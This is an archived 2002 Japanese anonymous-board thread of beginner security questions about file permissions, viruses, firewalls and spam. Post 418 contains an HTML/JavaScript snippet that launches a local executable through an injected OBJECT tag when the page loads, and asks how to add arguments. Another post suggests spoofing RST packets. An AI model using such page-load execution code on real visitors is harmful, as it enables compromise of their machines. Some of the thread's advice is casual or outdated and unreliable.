377名無しさん@お腹いっぱい。:02/01/23 17:22
378     :02/01/23 22:10
質問させていただきます。
このたびレンタルサーバを借りてウェブページを開設しました。
そこで閲覧者に見られたくないファイル(cgiのログファイル等)があ
るのですが、これはパーミッションを設定すれば見られないようにでき
るのでしょうか?また、見られたくないファイルを特定のフォルダにま
とめておいてそのフォルダの中身全体を見られないようにするにはどう
すればいいのでしょうか?

板違いだったらすいません
ここで質問するのが最も遠回りな気が…
>>378
>閲覧者に見られたくないファイル(cgiのログファイル等)があ
>るのですが、これはパーミッションを設定すれば見られないようにでき
>るのでしょうか?
ログファイル拡張子を*.cgiにしてあげれば、まっとうには見れませんですよ。
でも、お使いのCGIが汚染チェックを怠っていたりすると、
場合によっては意味が無いです、ええ。そればかりか致命的なアレでナニされます。

>フォルダの中身全体を見られないようにするには
.htaccessで、ええ。自分で調べてください。簡単ですから。
381名無しさん@お腹いっぱい。:02/01/23 23:26
Badtransスレで活躍してたネット屋は最近この板きてますか?
382    :02/01/24 00:40
>380さん
ありがとうございます。自分はあまりUnixいじったことがな
くて、パーミッションの認識がどうもあいまいです。
サイト閲覧者のもつファイルへのアクセス権とそのファイルのパ
ーミッションとは関係があるのでしょうか?
それとも.htaccessでフォルダごと制限するしかないのでしょうか?

わけのわからないこと言ってるかもしれないですがよろしくおねがいします



便乗質問させて下さい。俺の借りてるサーバは.htaccess置けないんですが、
こういう場合はどうすればいいんでしょう?
>>382
アクセス権の設定=パーミッションの設定

>>383
あきらめて別のサーバにしなさい
>>382
ログファイルは読み書きできないといけないからパーミッション606(666)。
・・・・・・。
はえー話が、これだとブラウザにログのファイル名ぶち込めば中身が見えます。
つべこべ言わずにログファイルの拡張子を*.cgiに。
ブラウザで直接アクセスするとInternal Server Errorが返ってきて (←要・デーモンがcgiをアレとして認識してること)
中が見れなくなります。CGIからは普通に扱えます。
.htaccessはフォルダにぶち込みます。これで幸せになれます。(;´Д`)アーメソ
CGIにも何にも使わないんなら最初からアップしない事です。

>>383
気休めに、見られたくないフォルダに空っぽのindex.htmlでも置いてちょ。
で、推察され難いファイル名(パスワードのような、英数字8文字程度)にして
勘の良い客が訪れない事を祈りましょう。(;´Д`)アーメソ
386名無しさん@お腹いっぱい。:02/01/24 01:43
ウィルスの質問でニフの会員なのですが
『「ウイルスバスター for @nifty Mail」は、あなたが送信したメールの
添付ファイルが、コンピュータウイルスに感染している恐れがあることを
感知しました。

メールの送信先 :(自分のメルアド)
添付ファイル名 : SETUP.DOC.scr
コンピューターウイルス: WORM_BADTRANS.B

ご利用のコンピュータがウイルスに感染していないか、ウイルス検出ソ
フトでご確認することをお勧めします。

ウイルスバスター for @nifty Mail
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
こういう警告がきましたがこのウィルスは窓だけではないかな〜?
と思ったのです。私はマック初心者なのですが。
それでウィルスバスター(会員用)やってますがHPみたらこの
メッセージは非会員向けのものらしくて…。
ニフに問い合わせメールしたいのですが質問送信フォームとか見当たらない
のです。どうしたらいいのか…;
>>386
バッドトランスはマックには感染しない
マック用のウイルスバスター製品は販売されてない

メール送信元に心当たりがなければ削除すればよい
388名無しさん@お腹いっぱい。:02/01/24 01:57
みなさんのオススメのフリーなfirewallを教えてください。
>>388
ゾーンアラーム
390名無しさん@お腹いっぱい。:02/01/24 02:03
>>389
やっぱりゾーンアラームは使いやすいですか。
他にはなにかありますか?
>>385
>ログファイルは読み書きできないといけないからパーミッション606(666)。

ん? これってどんな状況なん?
CGIが参照してHTML生成するなら単に600で良いんでは?
これだったら、ブラウザで直接参照できないよ。
>>391
そうでした・・・っけ?
(;´Д`) <オイラ、自信無しです。ここんとこ、とんとCGI弄ってないもんで。

いや、失礼しました。600で大丈夫なら600で。
ちょっち検証したところ、CGIがオーナー権限で動くなら600でも読み書きできますんけど、
ユーザー権限で動くときは606でないと読めなかったです。

必要に応じて設定してください ってことで。
394391:02/01/24 02:52
いやその…、そういや俺も自信なしだ。
レンタル鯖によっちゃCGIのアクセス権設定が違うかも?
395391:02/01/24 04:34
>>393
あ…やっぱり権限によって違ったか。スマソ
永遠の眠りについてきます…。
なんかWeb制作板みたいw

ログファイルのパーミッションが666とか606とかじゃないといけないサーバは個人的には嫌だなぁ。
397383:02/01/24 10:44
ありがとうございます>>385
さっそく実践します
398初心者:02/01/24 12:39
ワード使ってたら、勝手にページがすごいスピードで進んでいきました。
どういうウイルスなんですか?
教えてください。
>>398
そんなウイルスなんてないと思われ
マウスがぶっこわれてるんだろ?

ウイルスチェックもせずに聞くのはやめれ
400398:02/01/24 12:47
>>399
ご指導ありがとうございました。
401名無しさん@お腹いっぱい。:02/01/24 13:50
Meなんですけど、数分間何もしないでPCを置いておくと
HDがガリガリ騒ぎ出します。
再起動しないと止まらないんですが、これはOSのせいなんでしょうか?
それともウイルスなんでしょうか?
>>401
マルチ
403401:02/01/24 13:52
>>402

マルチって言うウイルスなんですか?
>>403
マルチポスト=多重投稿
やってはいけない行為
405ど素人:02/01/24 14:00
netstatの出力結果が理解できません。どこか詳細に解説してある所ないでしょうか?
>>405
あるよ 検索すれば?
407401:02/01/24 14:07
>>404
あぁ多重投稿のことでしたか。Win板の方でもハッキリした答えが聞けなくてつい・・・
すいません。
何も破壊活動がないということはOSのせいと言う事で諦めるしかないんでしょうか?
でも、このままほっといてもHDの寿命を縮めそうで・・・
誰か助けてください。
408ど素人:02/01/24 14:36
あきらめてnetstat.cを読みます。レスありがとうございました>406
409名無しさん@お腹いっぱい。:02/01/24 14:40
>>407
ネットやディスクへのアクセスを早くすると称する
アプリケーションにはそういう邪魔なことをするのがある。
最近そんなの入れないから知らないが、凄速とか
MS find fast(officeと一緒にインストールされる)
がそうだった。そういうのが入ってるならアンインストール。
インデックスサービスとかもCPUのアイドル中にカリカリやるのがウザいなぁ。
あんなサービスいらないし。
411401:02/01/24 14:47
>>409
Find fastありました。やってみます。
みなさんレスありがとうございます。
412名無しさん@お腹いっぱい。:02/01/24 17:45
すんません。
いい串ありませんかね。
413名無しさん@お腹いっぱい。:02/01/24 17:50
クッキーで個人の特定ができますか?
クッキーの名前って、ユーザ名@XXXX.comみたいになってますが
ユーザ名はサーバーの方では読めるんですか?
だれかおせーて。
414名無しさん@お腹いっぱい。:02/01/24 17:57
スレッド立てると、IP抜かれるんですか
よくアングラサイト行く時には串させ!とかききますけどやっぱ
生だと危険ですか?またどんな危険がありますか。
>>415
簡単にいけるUGサイトはへぼ管理人ばっかりだからだいじょうぶ
つーかアングラじゃない厨房サイトの方がむちゃするやつ多いので注意!
>>412
自分で探してね

>>413
個人の特定ってどのへんまでってこと?
メールアドレスを入れたのならメールアドレスまで相手にわかる

>>414
書き込むだけでIPアドレスは運営側に知られてるだろうよ
<head>
<script>
function run()
{
window.document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/calc.exe"></OBJECT>';
}
</script>
</head>
<body onload="run()">
</body>
でcalcが起動できますが、引数を渡すにはどうすればいいのでしょう?
419[email protected] :02/01/24 23:04
Received: from 24-148-67-115.na.21stcentury.net(24.148.67.115) by
smtp-gw.biglobe.ne.jp with SMTP;***+0900(JST)
From:"Ideas4u"< [email protected] >
Date:**
To: [email protected]
Subject:500 IDEAS to start your own Internet business
Message-ID:*
--
Do you want to put the power of the Internet to work for you,
but can't come up with that one profitable idea?
We're offering a first ever list of 500 new and innovative ideas
that you can instantly download
http://store.yahoo.com/ideas4u-store/index.html
-----
You received this e-mail because we are on a mutual safelist.
To REMOVE yourself from this list please follow the instructions
at the end of this email or send a blank email to
this list( [email protected] ) using the word "unsubscribe" as a header.

mail1.21stcentury.net (pri=0)
<220 mail1.21stcentury.net ESMTP
>HELO rlytest.nanet.co.jp
<250 mail1.21stcentury.net
>MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
<250 ok
>RCPT TO:<[email protected]>
<553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
正常:中継は拒否されました。
--
checkhouston.net
sitemail.everyone.net (pri=0)
<220 imta03.mta.everyone.net ESMTP Postfix
>HELO rlytest.nanet.co.jp
<250 imta03.mta.everyone.net
>MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
<250 Ok
>RCPT TO:<[email protected]>
<554 <[email protected]>: Recipient address rejected: Relay access denied (MTA:imta03)
正常:中継は拒否されました。
420名無しさん@お腹いっぱい。:02/01/25 00:20
http://tools.bb.yahoo.co.jp/setup/adsl/security/2k.html
コレを実行したいんですが、自分の環境だと04.gif(1番下)の画像の
2番の赤線で囲まれた項目が表示されません。
どういった理由が考えられますか?
OSはWindows2000sp2です。
>>420
ブラウザが壊れてる
422420:02/01/25 00:28
>>421
IEのVer書き忘れてしまいました。
現在5.01SP2です。
入れ直しついでに、5.5に上げてみます。
有難うございました。
423ひよこ名無しさん:02/01/25 00:36
拡張子がJPGなのにブラクラって、どーしてなの?
JPGって画像ファイルじゃないんですか?
>>423
偽装だ
雪印といっしょだ
>>423
「必ずしもそうでは無い」と考えている人たちがブラウザを作っているから。
426382    :02/01/25 00:44
答えてくださった皆さん>ありがとうございました。勉強になります。
427 :02/01/25 07:11
 
428初心者:02/01/25 09:45
文字化けをしたメールが届いたので開いたらそれからPCがおかしくなりました。
インターネット接続しているとすぐに
>このプログラムは不正な処理を行ったので強制終了されます。
のメッセージが入りシャットダウンしてしまいます。

解決方法はありますか?
>>428
なんのソフトを使っているかしらんが再インストールしてみな
430初心者:02/01/25 10:33
>>429
今までのデータは消えないんでしょうか?
>>429
だから何のソフト使ってるんだよ!
言いたくないなら勝手にしな
432初心者:02/01/25 10:42
>>431
Microsoft Outolook98だよ

Outolook ってなんじゃゴルァ!!
と言いたいところだが、グーグッてみると意外と見つかる。
そうか Outolook なのか...
434名無しさん@お腹いっぱい。:02/01/25 13:49
パソコンで、いつ、どんな操作が行われたか、どのソフトが使われたか
わかるようにするソフトってありますか?
わかりやすく言うと、IEの履歴みたいな感じで・・・。
誰かが、何か変なことしていないか心配なのです。
万が一、自分のIDとパスで、あらしでもされたら、自分の責任ですからね。
435健太郎@ろりこん136779786:02/01/25 13:56
ハッキング」から「夜のおかず」までを手広くカバーする巨大掲示板群です。。。
気兼ねなく、会社、学校、座敷牢からアクセスできるように、発信元は一切分かりません。
お気楽ご気楽に書き込んで下さい。

 
2ちゃんねる誰がやってるの? △ ▽  ▲ ▼

永遠の19歳、うまい棒が大好物のヒッキー、ひろゆきが個人で運営してます。。。

 
2ちゃんねるはアングラなの? △ ▽  ▲ ▼

誰もが自由に書き込みが出来る匿名掲示板のシステムには、
アンダーグラウンド(UG アングラ)のイメージが付きまといますが、
運営者としてはそういうスタンスではありません。

すべては利用する皆さんの良識にかかっています。。。よろしくです( ̄ー ̄) ニヤリッ

 
2ちゃんねるは本当に匿名なの? △ ▽  ▲ ▼

>>434
あると思うよ
OS不明だからこれ以上言えないが
437健太郎@ろりこん136779786:02/01/25 14:42
Hi,what's up?
How do you think about [2channelers]?
Don't you think that they are silly and childish race?
I do think!They're great crazy people, aren't they?!
BTW,I thought that no-one can understand my English BBs.how do you think?
At YAHOO BBs.,2channelers are stues?!Hum?Besides they aren't understand
they
are too stue!I'll never be able to find people like them!I want governments
to amend laws to put stues in prison!Also I want politician to be able to
read this!
If you wanna criticize me,you gotta graduate from Jr.school though!
Viva creasiest 2channelers!

はやくかけよ!連続投稿できねんですから
438434:02/01/25 14:43
>>436
OSはウィンドウズ98です。
439excite翻訳:02/01/25 15:12
今日は、どう?どのように[2channelers]に関して考えますか。
彼らが愚かで幼稚なレースであると思いませんか。Iは行います、
偉大な正気でない人々をthink!They'reする、それらでない?!BTW(I)は、
誰も私の英語のBBs.howを理解することができないと考えました、
考えますか。YAHOO BBで。2channelersはstuesです?!それらがそうでない
Hum?Besidesは、それらがまたstue!I'llであると理解します、
them!Iのような人々が、政府が、Iが、政治家がそうであることを望む
prison!Alsoにstuesを入れる法則を修正することを望むことを知ることが
できないこと、これを読むのに有能!場合、あなた、wanna、私を批評する、
あなた、gotta、ジュニア学校を卒業する、が!万歳の叫びの最もしわくちゃの
2channelers!
440たまご:02/01/25 15:16
来てください!
http://www.i-chubu.ne.jp/~hyamada/
441名無しさん@お腹いっぱい。:02/01/25 15:42
outlookexpressですが、
メ−ルの取りこみができなくなりました。
また画面の右下に黄色い三角じるしに!の
ようなエラ−マ−クが見えています。
どういうことでしょう?
>>441
サーバが混んでるんじゃないのか?
あるいはメンテナンス中とか
>>441
黄色い三角じるしをダブルクリック
444名無しさん@お腹いっぱい。:02/01/25 18:08
パソコンを起動するたびに画面いっぱいに知らない女の人の顔が出てきて
「悪ものは逮捕しちゃうぞ!」とか言われて困ってます。
ハードディスクをフォーマットしてWindowsを入れ直してもダメで
どうしてもこの女の人が出るんです。恐いです。助けてください。

ちなみに僕は逮捕されるような悪いことはした覚えはありません。
446名無しさん@お腹いっぱい。:02/01/25 18:22
win2kで
sp2入れてないことのヤバさを
何かにたとえて教えてください。。
447名無しさん@お腹いっぱい。:02/01/25 18:25
PW複数使うと

安全性は
アップするのでしょうか?
>>447
たぶんトラフィックがアップアップすると思います。
1個だとスピードアップくらいじゃないか?
5個ぐらいでバリアになると思うが。
450名無しさん@お腹いっぱい。:02/01/25 18:36
昔はフセイアクセス禁止法があり


下克上だったのですか?
451名無しさん@お腹いっぱい。:02/01/25 18:37
>>450
昔はフセイアクセス禁止法がなく


下克上だったのですか?

452親切な人:02/01/25 18:42

ヤフーオークションで、幻の人気商品、発見!!!

今は無き「コピーガードキャンセラー」↓
http://page5.auctions.yahoo.co.jp/jp/auction/e5843828

ヤフーオークション内では、現在、このオークション
の話題で、持ちきりです。
453名無しさん@お腹いっぱい。:02/01/25 19:30
会社のfirewallのアクセス制限を突破して好きなペイジを閲覧するには
どうすればよいのでしょう?

アノニマイザーはもちろんダメだったので、
いまのところエキサイトの翻訳ページ経由で見るくらいしか手がありません。
ただしテキストしか見れないけど。

つうか、別に怪しくもエロくもないペイジにも制限がかかってるのはナゼ?
>>453
怪しくもエロくもないペイジと怪しかったりエロかったりするペイジの区別を
自動的に行うことが出来ないから。
>>453
ダメ社員を正すためだろ
会社は仕事するとこだ サラリーマンは老後のためにせっせと働け
HPにイタズラ?(違うところにリンクされてる)とかって
どうやるんですか?
>>456
迷惑なのでそんなことは考えないで下さい
犯罪になります
でもかんがえたくなりますよね!!
すみません
やっぱかんがえないようにします
460:02/01/25 22:48
えらい弱腰やな
2chでだめなら
どう言うところで勉強したらいいんですか?
>>461
何の勉強?
数学なら大学でいいだろ?
463461:02/01/25 22:55
い・た・ず・ら(ハート
>>463
いたずらの勉強なんて聞いた事ないので勝手に自分でやれ
あと小学生だったらもう寝ろ
ツイスターが終わってしまったので寝ます
でもナイトスクープを見たいから起きてます
こわくてみてらんない
468王蟲:02/01/25 23:32
ハッカーにやられた形跡があるんですが・・・
systemファイルに意味不明なファイルが1000個以上あるんです
そのファイルを削除しようとしたんですが
systemファイルを開こうとするとフリーズしてしまいます
どうやって削除できますか?
教えてください
469名無しさん@お腹いっぱい。:02/01/25 23:33
トラブルがあって、トラブル相手にメアドを知られてしまったんですが、
メアドから個人情報漏れることってありますか?
初心者ですみません。マジでびびってるのでよろしくおねがいします。
>>468
OS再インストール
systemファイルは無闇にいじるな

>>469
相手がPCに詳しくなければ簡単には漏れないから安心しろ
トラブりそうな相手には匿名のフリーメアドを教える
プロバのメアドは使うな
471にょ:02/01/25 23:48
板が違っている様な気もしなくもないのですが、
どこへ質問すれば良いのか判らないので、此方でさせて頂きます。

先日、ISDNからADSLへと(フレッツ)変更した際、セキュリティが
心配になり、ノートンのインターネットセキュリティ2002を導入
したところ、特定のHPスペースに入ってるサイトのカウンターが
見えなくなり、また、特定の掲示板への書き込みができなくなりました。
説明書のトラブルシューティングに従って、一時的に監視を無効にした
ところ、問題が起こらないことが確認できたので、ソフトが原因で
あることは間違いない様です。
設定方法も説明書に書いてあることはあるのですが、いまいち内容が
理解しきれません。
どなたか、対処方法、もしくは対処方法がわかりやすく紹介されている
サイトを教えていただけませんでしょうか?
よろしくお願いいたします。

この板にも、切ってないと書き込めません(泣)
ノー豚入れたら…のスレって、
なんでこういう人には見つけられないんだろう?
473名無しさん@お腹いっぱい。:02/01/25 23:57
>>470
お返事ありがとうございます。
相手がときメモマニアなので、PCにも詳しいような気がしないでも
ないんですが、個人情報ってそう簡単に漏れるわけでもなさそう
なんですね。一応プロバは朝日ネットなんですけど。
でもウイルス送りつけられたら恐いからとりあえずアドレス
変えようっと。
あとリスク伴いそうな取引の時はhotmailを使うことにします。
早速加入しました。

ありがとうございました。
474にょ:02/01/25 23:58
ノー豚……
あ・・・ある(焦)
ごめんなさい、眼悪いくせにフォント小さくしてました(馬鹿
逝ってきます
ありがとうございました
>>471
geoシティーズか?
リファきってるから見れないんだよ。
持ってないので設定のばしょはシラソ。

ひまだからまじめに解凍終了
476名無しさん@お腹いっぱい。:02/01/26 00:12
メンバーIDとかパスワードとかが載っているサイトってあるものなの?
尻有とかならよくみるけど。
477名無しさんです:02/01/26 00:14
今日あるサイトでカスタムクリックのバナーが
ノートンファイアーウォールに ひっかかった。
アウトバウンドで。何送信しようと してるのでしょう?
478477:02/01/26 00:23
あ、ちなみにeb板で返事がなかったのでここに来ました。
よろしくです。
>>476
海外によくある もちろん犯罪

>>477
ノートンのログ見れ
どうせクッキーかなにかでしょう
480名無しさん@お腹いっぱい。:02/01/26 00:41
ウィルス対策ソフトって正直な所、必要なんですか??
481にょ:02/01/26 03:34
板が違っている様な気もしなくもないのですが、
どこへ質問すれば良いのか判らないので、此方でさせて頂きます。

先日、ある友人から聞かれたのですが、なんでも友人の会社に
縁故入社できたやつが、社内のPCを勝手にRANを組んだ上、
突然、行方不明になったらしいんです。
おまけに、そいつが勝手に自分を管理者にして、PCの全データを
自分にしか見れないようにしたらしいんです。友人も含め、他の人は許可
された1部分しか見れないらしいんです。
どなたか、対処方法、もしくは対処方法がわかりやすく紹介されている
サイトを教えていただけませんでしょうか?
よろしくお願いいたします。
>>480
必要 winユーザならなおさら

>>481
捜索願いなら警察へ
OSも書かずに質問はよせ
社内PCに勝手にLANを組まれるその会社のセキュリティがやばい
483鈴木心如斎:02/01/26 05:27
篠原涼子さんは真性の篠原涼子さんなのか?!
484鈴木心如斎:02/01/26 05:29
電波!電波!ネオナチ電波!漂う!受信するな!洗脳される!
ネオナチ!プロパガンダでラジオ多用から前進なし!
電波!電波!電波!電波!
485名無しさん@お腹いっぱい。:02/01/26 05:30
>481
金庫破りと同じ。
素人に簡単に破られるようだったら、金庫の意味がない。
486名無しさん@お腹いっぱい。:02/01/26 06:23
これって何ですか?
今ファイアウォール(TPF)に引っかかったんですけど。

Outgoing Connection Alert!
'MDIBrowser' from your computer wants to connect to
j076155.ppp.asahi-net.or.jp[61.213.76.155],port18201
でポートが18201〜18205まで。

ここで61.213.76.155を調べたら↓のような結果でした。
誰か分かる人いますか?
487名無しさん@お腹いっぱい。:02/01/26 06:23
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information:
a. [Network Number] 61.213.64.0-61.213.127.0
b. [Network Name] ASAHI-NET
g. [Organization]   Asahi Net
m. [Administrative Contact] AT009JP
n. [Technical Contact]  AT009JP
p. [Nameserver]  crusader.asahi-net.or.jp
p. [Nameserver]   falcon.asahi-net.or.jp
y. [Reply Mail]  [email protected]
[Assigned Date] 2001/07/03
[Return Date]
[Last Update] 2001/07/03 15:03:08 (JST)
[email protected]

>>486
ポートスキャンだろ?
489486:02/01/26 06:24
490486:02/01/26 06:29
>>488
ポートスキャンですか。
asahi-net使ってないんで、何だろうって思ったんです。
491名無しの権兵衛:02/01/26 06:52
あの〜IPアドレスが分かると何か出来ますか?例えでいいのですが。。。
492名無しさん@お腹いっぱい。:02/01/26 06:53
いろんな所にカキコされてて、怖いってかいてあるんだけど
これは、何なのですか?ウイルス?

http://myhome.hananet.net/~crazyghost/goto.htm
493↑直リンしないでね:02/01/26 06:58
>>491
穴が開いてたら入れる。
494名無しの権兵衛:02/01/26 06:58
↑鬼婆のドアップでたよ(泣)
495名無しの権兵衛:02/01/26 07:00
穴?入れる?穴とはセキユリティポートとかの事?
でもって入ってどうすんの?教えて教えて!
セキュリティーホールだな(w
入れたら、何でもし放題だけど、
知らない人のPCの中身なんて見ても面白くないし、
結局イタズラするやつが多いけど
下手にいじると器物破損になるからな。
497初心者厨房:02/01/26 07:41
やばいです。htmlメールが来たんだけど、何を考えたのか開いてしまいました。
件名が「Im going to disney land! 16531」(Imにアポストロフィー無し)
で、添付ファイルは無し。本文もありませんでした。
でもメッセージのソース見たら、htmlにjavaスクリプトが…!
ノートンでチェックしたけど、最新定義にもひっかかりませんでした。
新種でしょうか?感染したのでしょうか?
498名無しさん@お腹いっぱい。:02/01/26 07:44
ディスニーランドに一緒に逝ってあげればよろしんではないかと…
499初心者厨房:02/01/26 07:46
IPAに逝って来ます
500ど素人:02/01/26 10:10
>>497
気になるので、ヘッダ見せて
501名無しさん@お腹いっぱい。:02/01/26 10:22
2chでホットメールのアドレス書いたら
トロイ埋め込まれるんでしょうか?
502初心者厨房:02/01/26 11:00
ヘッダのメアドに、○○○@hackphreak.orgってのがある。
ハック…フリーク…ぎゃー!!!
503トロイ:02/01/26 11:11
Trojan.Win32.Viseの駆除方法はありますか?
504 :02/01/26 11:16
みなさん、こんばんは。
もう、ある程度の靴が揃ったので、買う必要はないのですが、今日のように疲れた翌日などストレスがたまると、何となく買いたくなります・・・。
日本では、欲しい靴はないのですが、靴散策をしていい靴があったら、・・・。
とはいっても、理性はあるので、ヨーロッパにない靴しか選択肢はありません。
となると、アメリカンな靴で買い得感のあるアレンか、メイド・イン・ジャパンの靴の何かでしょうか。
本当に買う確率はほとんどないのですが、このように、何か買おうかなと考えるのも楽しいものです。
実は、先週見た、アレンのU−チップが気になっています。
ダークバーガンディーのコードバンは、グレインレザーしかないので、アレンで揃えるのもいいかなぁって・・・。
まぁ、このデフレでは、無駄な消費は控えるべきなので、冷静になれるように、靴ショップには今日は行きません。
でも、明日は・・・(意味深)。
505名無しさん@お腹いっぱい。:02/01/26 11:51
506名無しさん@お腹いっぱい。:02/01/26 12:20
バッドトランスウィルスに感染した人からメールをもらったら、
別のウィルスに変換されるなんて事あるのでしょうか?
>>486
>>488
英語の勉強しなさい。
>>501
そんなことはないがここでメールアドレスを書かない方がいい
何送られるか分からんぞ

>>502
んでどうした?
>>503
ある

>>506
ないと思われ
510トロイ:02/01/26 17:06
>>509
・・・で方法は?
>>510
ウイルス対策ソフトを買ってこい
まあ持ってるだろうけどね

感染もしてないのになぜ駆除方法を聞きたがるのか分からん
512名無しさん@お腹いっぱい。:02/01/26 17:23
windowsの自動アップデートの通知ありますよね。エロサイト開いたら
突然通知がきて今ごろ12月17日の修正プログラムをDLするように通知が
来たんだけど、もしかしてそこのHP管理者がMSの通知と全く同じモノを
閲覧者にしかけてそこにウィルスなどをしかけているという被害例は今ま
でありましたか?答えが出たあとでDLしたいと思います
まず、そのサイトのURLを貼れ。
514さわこ:02/01/26 17:33
あのー、みなさんに質問があります。
最小化のボタンが「0」、最大化が「1」、閉じるが「r」・・・
その他にもいろいろ。
これはウィルスに感染したということなのでしょうか?
515(゜▼゜*):02/01/26 17:35
516名無しさん@お腹いっぱい:02/01/26 17:37
初心者です。
Re:メールで有名になったウイルスの名前教えて下さい!
517名無しさん@お腹いっぱい。:02/01/26 17:37
ttp://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip
これ踏んだんだけどやばいですかね?。
518(゜▼゜*):02/01/26 17:43
>>516
まずココ↓へいきます。
http://www.google.com/
キーワードに"Re:メール ウイルス"とでも入れて検索してください。
519516:02/01/26 17:47
>>518
さんくす!
520名無しさん@お腹いっぱい。:02/01/26 17:52
>>514
フォントキャッシュが壊れてるんじゃないかと思われ。
フォントの種類がへっていたら、修正プログラムを適用しなされ。
フリーで配布されているはず。
>>517
踏んだだけなら単なるzip圧縮ファイル。
中身はたぶん得体のしれない実行ファイル
522さわこ:02/01/26 17:53
(゜▼゜*)さん、ありがとうございましたです。
無事、修復できましたです。
とってもありがとうです。
523ナディア:02/01/26 18:00
>>517 半角で踏んだな。それやばくない
ソノプログラムは解凍実行すると、デスクトップにmadoka.exeとc:\windows
にozawa.exe&ozawa.logを生成して、親切にもwin.iniに run=ozawa.exe と書き込んでくれます。
多分、517の今の状態は、一定時間ごとに「きゃ〜」と叫び声がして
かわゆい女の子が数秒現れると言う動作を繰り返しているはずです。(笑
ま、それはそれで乙なものなのですが。。。
消し方は・・デスクトップのmadoka.exeを削除。次に
c:\windous\win.iniをメモ帳で開き、run=ozawa.exeの記述を
削除、上書き保存。リブート後、c:\windows\ozawa.exe&ozawa.logを削除。
で、もう一丁リブート。     by ナディア

524さわこ:02/01/26 18:02
>>520
ありがとうです。
ちょっと具合がわるくなっても、自分でどこが悪いのかわからない・・・。
おべんきょう、しまっす。
525第三者中継可能?:02/01/26 18:03
From:AMERIONE MASTERCARD< [email protected] >
To: [email protected]
Subject:Friend,100% Guaranteed Approval!
Date:**
Received:from[205.244.70.4]by sitemail.everyone.net with ESMTP id **
Received: from lsmail1 (216.242.16.45) by lsmail4.opthome.com (LSMTP for Windows NT v1.1b) with SMTP id < [email protected] >
From [email protected]
---
Get your AmeriOne MasterCardョ here. It is 100% Guaranteed Approval. You can receive card limit up to $7500 with,
- O% interest - No Credit Check - No late Charges - No Checking account required
The e-mail subscription address is: [email protected]
To unsubscribe please click here. or Send an email with remove as the subject to [email protected]
527名無しさん@お腹いっぱい。:02/01/26 19:50
CLOSE_WAIT状態のポートを手動で閉じる方法ってあるんでしょうか?
netstatやって見たら30個位CLOSE_WAIT状態のポートがあるんで
こいつらを何とかしたいんです。
OSはWIN98です。
RST受信すれば閉じるから、自分向けにIP spoofしたRST送れば閉じるかも知れん。
529名無しさん@お腹いっぱい。:02/01/27 15:50
こんにちは
突然すいません、PCがシャットダウン出来なく困ってます・・・
なんか分からないんですが、その権限が無いってPC言われて出来無くなりました。
コンピュータの管理で見てみたらユーザーとグループの所に×印。
イベントビューアー、アプリとシステムの
AM3時〜10時がスッポリ抜けててその後、新たにログ開始になってました・・
気持ち悪いのでアンチウィルスチェック使用としたら
無効になってて再インストールを求められました。
その間、私はPCに触れていなかったんですが
MXをサーバーから切って起動してました。
まじ、ブルッてます。なんででしょう?侵入されたんでしょうか?
教えてください。
Win2000 ZoneAlarm NortonAntiVirus2002使ってます。
530名無し:02/01/27 16:01
ウイルスバスター2002がPingAttackを検知しました。
ドメインサーチしたら、どうやら中国からの様です。
Googleで検索してもいまいち判りません。

簡単に説明して頂けませんか?
531名無しさん@お腹いっぱい。:02/01/27 16:04
bv
・・・何を検索したいんですか?
533yaya:02/01/27 16:12
madokaというもので苦労しました。ウィルス対策は必要だなと思い、最初からパソコンに入っていた、VirusScanというものをやってみました。スキャンをすると、不正な処理うんぬんかんぬんとなり、実行できません。なぜでしょうか?
534530:02/01/27 16:15
PingAttackをされると、どんな実害がでるのか
教えて頂きたいです。

なんか最近OS(WinMe)がガタガタなんです。
>>534
無害

ガタガタなのは他に原因があります。
536名無しさん@お腹いっぱい。:02/01/27 17:27
>>534
うけたくなかったらICMPをDISABLEにしておくんなせえ
537530:02/01/27 17:37
>>535>>536

サソクス 安心しました
初心者がサンクスとか言うなよ。ヴォケが。>>537
>>538
なん〜でだ??
>>538 によると、
初心者は言語上の制約も受けなければいけないらしい。
541名無しさん@お腹いっぱい。:02/01/27 18:32
>>538の腐った頭によれば
初心者は感謝の言葉を述べるとき
「ヨンクス」と言わなければならないようだ。
Beginnerという英単語にそのような訳があるからなのかどうかは知らないが、>>1-541のような
自称「初心者」は困ったものだ。Beginnerという単語は単に「何かを初めて行い始めたばかりの人」という
意味しか無いと思っている。

日本語における「初心」の真意は何だろうか。
世流能楽の大成者・世阿弥は「初心忘るべからず」という諺を残したが、この諺にこそ「初心」の
真意が込められていると思う。

この「初心」には”何かを初めて行い始めた”という状態を指す意味も勿論含まれているが、
”初めてだからこそ、より上を目指して人並み以上に自己努力・自己研鑚する心意気”という意味も
多分に含められているはずだ。だからこそ「初心忘るべからず」という諺が成立するのである。

>>1のようにBeginnerであるにも拘わらず、少しでも分からないことがあればすぐ人に聞くような
態度を見せる人は、「初心を持つ人」たる「初心者」と自ら名乗るには到底値しない人なのである。
例えば>>1のような人が「初心忘るべからず」という態度を取リ続けたらどうだろう。
本人は遅々として成長せず、周囲にだけは多大な迷惑がかかるはずだ。そのような人間には
「初心者」を名乗る資格はない。「ビギナー」「無為(むい)者」等と名乗るべきである。  
543初心者:02/01/27 18:42
>>542
で?
544 :02/01/27 22:47
545名無しさん@お腹いっぱい。:02/01/27 22:54
例のヒカルが気になってトレンドのオンラインスキャンして
みたのですが、使用OSがMEなのに枠に書かれている
「−トロイの木馬の検索について Windows 95/98/Meをお使いの場合、
ウイルス検索を開始しますと、MS-DOSプロンプトの画面(右画像参照)が
起動します」
のように、MS-DOSプロンプトの画面が出ないのですが、
既にトロイに「発見させないよ〜」ってな感じで検知できないように
何かされているのでしょうか?
>>542
どうでもいいが、そのコピペ、ここの現状に合ってないな。
だいたいここの>>1ってこれ、Part6のスレだし。
高ぁ〜いところからの視点で見て書いてるつもりかもしれんけど、
全然モノが見えてないし…。
>>545 さんはマルチですか?
それともたまたまそうなっただけですか?
だってどのスレも一人も答えてくれないんだもん・・・
>>548
マルチしたからだろ
